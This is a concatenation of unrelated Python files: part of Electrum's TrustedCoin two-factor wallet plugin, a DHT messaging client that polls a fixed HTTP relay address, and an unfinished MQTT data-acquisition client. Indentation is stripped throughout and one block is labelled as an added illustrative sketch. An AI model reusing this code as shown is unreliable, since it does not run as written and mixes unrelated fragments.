def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
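
# --- Illustrative sketch (not part of the original file) ---
# A hedged example of how a caller might use TrustedCoinCosignerClient. It is
# wrapped in a function so nothing runs at import time; the xpubs and email are
# placeholders, and send_request() needs a running Electrum Network instance.
def _example_cosigner_flow():  # hypothetical helper, for illustration only
    client = TrustedCoinCosignerClient(user_agent="example/0.1")
    tos = client.get_terms_of_service()  # plain-text terms for the default billing plan
    print(str(tos)[:200])
    # r = client.create("xpub...hot", "xpub...cold", "user@example.com")
    # A successful reply is expected to carry 'id', 'otp_secret' and
    # 'xpubkey_cosigner' (see create_remote_key further below).
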
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, fixed_fee, change_addr)
fee = self.extra_fee() if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
            t.daemon = True
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
        # old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
dht_msg.py
|
import sys
import random
import requests
import binascii
import umsgpack
from ast import literal_eval
from future.moves.urllib.parse import urlencode
#from multiprocessing import Process as Thread, Event
from threading import Thread, Event
from storjkademlia.node import Node as KadNode
from pyp2p.lib import is_ip_valid, is_valid_port
from twisted.internet import defer
import json
import string
try:
from Queue import Queue # py2
except ImportError:
from queue import Queue # py3
import time
import logging
dht_msg_endpoint = "http://185.61.148.22/dht_msg.php"
# dht_msg_endpoint = "http://localhost/dht_msg.php"
logging.basicConfig()
log = logging.getLogger(__name__)
LONG_POLLING = True
RESERVATION_TIMEOUT = (10 * 60) - 5
MUTEX_TIMEOUT = RESERVATION_TIMEOUT
ALIVE_TIMEOUT = (60 * 10) - 5
class DHTProtocol:
def __init__(self):
self.messages_received = None
class DHT:
def __init__(self, node_id=None, ip=None, port=0, password=None, network_id="default", debug=1, networking=1):
self.node_id = node_id or self.rand_str(20)
if sys.version_info >= (3, 0, 0):
if type(self.node_id) == str:
self.node_id = self.node_id.encode("ascii")
else:
if type(self.node_id) == unicode:
self.node_id = str(self.node_id)
self.node_id = binascii.hexlify(self.node_id).decode('utf-8')
self.password = password or self.rand_str(30)
self.ip = ip
self.port = port
self.network_id = network_id
self.check_interval = 3 # For slow connections, unfortunately.
self.last_check = 0
self.debug = debug
self.networking = networking
self.relay_links = {}
self.protocol = DHTProtocol()
self.is_registered = Event()
self.is_mutex_ready = Event()
self.is_neighbours_ready = Event()
self.handles = []
self.threads = []
self.running = 1
self.has_mutex = 0
self.neighbours = []
# Register a new "account."
if self.networking:
self.register(self.node_id, self.password)
self.is_registered.wait(5)
self.mutex_loop()
self.is_mutex_ready.wait(5)
self.alive_loop()
self.find_neighbours_loop()
self.is_neighbours_ready.wait(5)
assert(self.is_mutex_ready.is_set())
assert(self.is_registered.is_set())
self.message_handlers = set()
def stop(self):
self.running = 0
for handle in self.handles:
handle.close()
# handle.raw._fp.close()
def hook_queue(self, q):
self.protocol.messages_received = q
self.check_for_new_messages()
def retry_in_thread(self, f, args={"args": None}, check_interval=2):
def thread_loop(this_obj):
while 1:
try:
while not f(**args) and this_obj.running:
time.sleep(check_interval)
if not this_obj.running:
return
return
except Exception as e:
print("unknown exception")
print(e)
time.sleep(1)
t = Thread(target=thread_loop, args=(self,))
        t.daemon = True
self.threads.append(t)
t.start()
return t
def check_for_new_messages(self):
def do(args):
for msg in self.list(self.node_id, self.password):
self.protocol.messages_received.put(msg)
return 0
if LONG_POLLING:
self.retry_in_thread(do, check_interval=0.1)
else:
self.retry_in_thread(do, check_interval=2)
def mutex_loop(self):
def do(args):
# Requests a mutex from the server.
call = dht_msg_endpoint + "?call=get_mutex&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5).text
if "1" in ret or "2" in ret:
self.has_mutex = int(ret)
self.is_mutex_ready.set()
return 0
self.retry_in_thread(do, check_interval=MUTEX_TIMEOUT)
def alive_loop(self):
def do(args):
            # Pings the server so this node stays marked as alive.
call = dht_msg_endpoint + "?call=last_alive&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password})
# Make API call.
ret = requests.get(call, timeout=5)
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def can_test_knode(self, id):
for neighbour in self.neighbours:
if neighbour.id == id:
if neighbour.can_test:
return 1
return 0
def has_testable_neighbours(self):
for neighbour in self.neighbours:
if neighbour.can_test:
return 1
return 0
def find_neighbours_loop(self):
def do(args):
            # Requests this node's neighbours from the server.
call = dht_msg_endpoint + "?call=find_neighbours&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"network_id": self.network_id})
# Make API call.
ret = requests.get(call, timeout=5).text
ret = json.loads(ret)
if type(ret) == dict:
ret = [ret]
# Convert to kademlia neighbours.
neighbours = []
for neighbour in ret:
if not is_ip_valid(neighbour["ip"]):
continue
neighbour["port"] = int(neighbour["port"])
if not is_valid_port(neighbour["port"]):
continue
knode = KadNode(
id=binascii.unhexlify(neighbour["id"].encode("ascii")),
ip=neighbour["ip"],
port=neighbour["port"],
can_test=int(neighbour["can_test"])
)
neighbours.append(knode)
self.neighbours = neighbours
self.is_neighbours_ready.set()
return 0
self.retry_in_thread(do, check_interval=ALIVE_TIMEOUT)
def get_neighbours(self):
return self.neighbours
def add_relay_link(self, dht):
node_id = binascii.hexlify(dht.get_id())
self.relay_links[node_id.decode("utf-8")] = dht
def debug_print(self, msg):
if self.debug:
print(str(msg))
def add_message_handler(self, handler):
self.message_handlers.add(handler)
def remove_transfer_request_handler(self, handler):
pass
def rand_str(self, length):
return ''.join(random.choice(string.digits + string.ascii_lowercase +
string.ascii_uppercase
) for i in range(length))
def register(self, node_id, password):
def do(node_id, password):
try:
# Registers a new node to receive messages.
call = dht_msg_endpoint + "?call=register&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"port": self.port}) + "&"
call += urlencode({"network_id": self.network_id})
if self.ip is not None:
call += "&" + urlencode({"ip": self.ip})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
self.is_registered.set()
return 1
except Exception as e:
print(e)
self.debug_print("Register timed out in DHT msg")
self.debug_print("DHT REGISTER FAILED")
return 0
mappings = {
"node_id": node_id,
"password": password
}
self.retry_in_thread(do, mappings)
def build_dht_response(self, msg):
msg = binascii.unhexlify(msg)
msg = umsgpack.unpackb(msg)
try:
str_types = [type(u""), type(b"")]
if type(msg) in str_types:
msg = literal_eval(msg)
except:
msg = str(msg)
return msg
def serialize_message(self, msg):
msg = umsgpack.packb(msg)
msg = binascii.hexlify(msg)
return msg
def async_dht_put(self, key, value):
d = defer.Deferred()
def do(args):
t = self.put(key, value, list_pop=0)
            while t.is_alive():
time.sleep(1)
d.callback("success")
return 1
self.retry_in_thread(do)
return d
def async_dht_get(self, key):
d = defer.Deferred()
def do(args):
ret = self.list(node_id=key, list_pop=0, timeout=5)
if len(ret):
d.callback(ret[0])
else:
d.callback(None)
return 1
self.retry_in_thread(do)
return d
def put(self, node_id, msg, list_pop=1):
def do(node_id, msg):
if node_id in self.relay_links:
relay_link = self.relay_links[node_id]
msg = self.build_dht_response(self.serialize_message(msg))
relay_link.protocol.messages_received.put_nowait(msg)
return 1
try:
# Send a message directly to a node in the "DHT"
call = dht_msg_endpoint + "?call=put&"
call += urlencode({"dest_node_id": node_id}) + "&"
msg = self.serialize_message(msg)
call += urlencode({"msg": msg}) + "&"
call += urlencode({"node_id": self.node_id}) + "&"
call += urlencode({"password": self.password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
ret = requests.get(call, timeout=5)
self.handles.append(ret)
if "success" not in ret.text:
return 0
return 1
except Exception as e:
# Reschedule call.
self.debug_print("DHT PUT TIMED OUT")
self.debug_print(e)
self.debug_print("Rescheduling DHT PUT")
self.debug_print("PUT FAILED")
return 0
mappings = {
"node_id": node_id,
"msg": msg
}
return self.retry_in_thread(do, mappings)
def list(self, node_id=None, password=None, list_pop=1, timeout=None):
if not self.networking:
return []
node_id = node_id or self.node_id
password = password or self.password
try:
# Get messages send to us in the "DHT"
call = dht_msg_endpoint + "?call=list&"
call += urlencode({"node_id": node_id}) + "&"
call += urlencode({"password": password}) + "&"
call += urlencode({"list_pop": list_pop})
# Make API call.
if timeout is None:
if LONG_POLLING:
timeout = None
else:
timeout = 4
ret = requests.get(call, timeout=timeout)
self.handles.append(ret)
content_gen = ret.iter_content()
messages = ret.text
messages = json.loads(messages)
# List.
if type(messages) == dict:
messages = [messages]
# Return a list of responses.
ret = []
if type(messages) == list:
for msg in messages:
dht_response = self.build_dht_response(msg)
ret.append(dht_response)
return ret
except Exception as e:
print("EXCEPTION IN DHT MSG LIST")
self.debug_print("Exception in dht msg list")
print(e)
return []
def direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def repeat_relay_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def async_direct_message(self, node_id, msg):
return self.send_direct_message(node_id, msg)
def send_direct_message(self, node_id, msg):
if sys.version_info >= (3, 0, 0):
if type(node_id) == bytes:
node_id = binascii.hexlify(node_id).decode("utf-8")
else:
if type(node_id) == str:
node_id = binascii.hexlify(node_id).decode("utf-8")
if type(node_id) != str:
node_id = node_id.decode("utf-8")
self.put(node_id, msg)
def get_id(self):
node_id = self.node_id
if sys.version_info >= (3, 0, 0):
if type(node_id) == str:
node_id = node_id.encode("ascii")
else:
if type(node_id) == unicode:
node_id = str(node_id)
return binascii.unhexlify(node_id)
def has_messages(self):
return not self.protocol.messages_received.empty()
def get_messages(self):
result = []
if self.has_messages():
while not self.protocol.messages_received.empty():
result.append(self.protocol.messages_received.get())
# Run handlers on messages.
old_handlers = set()
for received in result:
for handler in self.message_handlers:
expiry = handler(
self,
received
)
if expiry == -1:
old_handlers.add(handler)
# Expire old handlers.
for handler in old_handlers:
self.message_handlers.remove(handler)
return result
return result
if __name__ == "__main__":
#node1 = DHT()
#print(node1.get_id())
#print(node1.node_id)
pass
"""
node1 = DHT()
node2 = DHT()
node1.put(node2.node_id, "test")
running = 1
time.sleep(5)
node1.stop()
node2.stop()
"""
"""
#print(node2.protocol.messages_received.get())
#print(node2.get_messages())
while not node2.has_messages() and running:
for msg in node2.get_messages():
running = 0
print(msg)
print("No longer runnig")
"""
"""
#dht_node = DHT(node_id=b"\111" * 20, password="svymQQzF1j7FGmYf8fENs4mvRd")
dht_node = DHT(node_id=u"T", password="svymQQzF1j7FGmYf8fENs4mvRd")
x = [("a", 2), ("b!%--", 2)]
dht_node.put(dht_node.node_id, x)
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.get_id())
print(type(dht_node.get_id()))
dht_node.send_direct_message(dht_node.node_id, u"test")
print(dht_node.list(dht_node.node_id, dht_node.password))
exit()
print(dht_node.node_id)
print(dht_node.password)
print(dht_node.list(dht_node.node_id, dht_node.password))
"""
|
client_ad_runner.py
|
import paho.mqtt.client as mqtt
from threading import Thread
from ast import literal_eval
import ADS1256
import config
from queue import Queue
from extract_data import run
class My_client_ad(Thread):
    '''
    Class used to represent an active MQTT client.
    Attributes
    ----------
    broker : ...
    port : ...
    topic : ...
    client : ...
    userdata : ...
    msg : ...
    Methods
    -------
    on_connect : keeps the client connected and subscribed to the topic
    on_message : handles receiving the control message and publishing the acquired data
    run : starts the client
    '''
def __init__(self, broker, port, topic):
        '''
        -Class constructor; sets the initial parameters when the object is instantiated-
        Parameters:
            broker : address of the MQTT broker server.
            port : port used to communicate with the broker.
            topic : topic used for subscribing and publishing messages.
        '''
Thread.__init__(self)
self.broker = broker
self.port = port
self.topic = topic
        self.q = Queue()  # queue used to hand the acquired data back from the reader thread
self.t1 = Thread(target=run, args=(self.q,))
def on_connect(self, client, userdata, flags, rc):
        '''
        -Defines the client connection callback, subscribing it to the configured topic-
        Parameters:
            client : the client object
            userdata : user data passed to the callbacks
            flags : response flags sent by the broker
            rc : the connection result
        '''
        client.subscribe(self.topic)  # subscribe to the topic
def on_message(self, client, userdata, msg):
print("[MSG RECEBIDA] Topico: "+msg.topic+" / Mensagem: "+str(msg.payload.decode('utf-8')))
if msg.payload.decode('utf-8') == "on": # Verifica se a menssagem recebida para o inicio da leitura
self.t1.start() # inicia a leitura do dispositivo
print("leitura iniciada")
if msg.payload.decode("utf-8") == "off": # Verifica se a menssagem recebida para o inicio da leitura
self.t1.do_run=False #término da leitura do dispositivo
self.t1.join()
data = self.q.get()# armazena os dados na variavel data
self.t1 = Thread(target=run, args=(self.q,))
client.publish('request', str(data))# publica os dados ao tópico request
print('finalizado')
def run(self):
